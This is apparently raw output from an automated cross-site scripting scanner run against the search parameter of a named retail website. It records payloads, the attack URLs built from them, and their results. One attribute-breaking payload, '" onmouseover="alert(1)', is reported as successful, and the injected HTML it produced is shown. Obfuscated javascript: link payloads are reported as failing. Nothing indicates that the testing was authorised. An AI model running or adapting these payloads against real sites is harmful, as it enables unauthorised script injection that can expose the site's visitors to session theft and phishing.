https://www.redrivercatalog.com/

GET Params:[1]
['addsearch']
_______________________________________________________________________________________________________
https://www.redrivercatalog.com/search.html?addsearch=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [3]
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="(uvw"xyz'yxz</zxy">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="(uvw"xyz'yxz</zxy">
<input class="form-control" style="display:inline-block; width:auto" type="text" name="addsearch" id="Search" class="textfield" value="&#40;uvw&quot;xyz'yxz&lt;/zxy"/>

----------------------------------------------------------------------------------
HTML Context: [1]
<span class="text-monospace">&#40;uvw&quot;xyz'yxz&lt;/zxy</span>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [1]
<a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=(uvw"xyz'yxz</zxy">

----------------------------------------------------------------------------------

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	( 
ATTR:		False	True	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)']

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)

 ______ UnSuccessful with payload: " onmouseover="alert(1)

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	( 
ATTR:		False	True	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)']

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)

=> Successful with Payload: " onmouseover="alert(1)
FINAL OUTPUT: 
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">
<a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert(1)">
	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	( 
ATTR:		True	True	True	True

Attack Payloads for ATTR
[]
Mitigation        "	'	<	( 
HTML:		True	False	True	True

Attack Payloads for HTML
[]
Mitigation        "	'	<	( 
URL:		False	False	False	False

Attack Payloads for URL
['<a href="ja&#9;vasc&#10;ript&#58;alert&#40;1&#41;">XYZ_XSS</a>', '%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E']

URL Attack Url: https://www.redrivercatalog.com/search.html?addsearch=<a href="ja&#9;vasc&#10;ript&#58;alert&#40;1&#41;">XYZ_XSS</a>

 ______ UnSuccessful with payload: <a href="ja&#9;vasc&#10;ript&#58;alert&#40;1&#41;">XYZ_XSS</a>


URL Attack Url: https://www.redrivercatalog.com/search.html?addsearch=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E

 ______ UnSuccessful with payload: %3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E

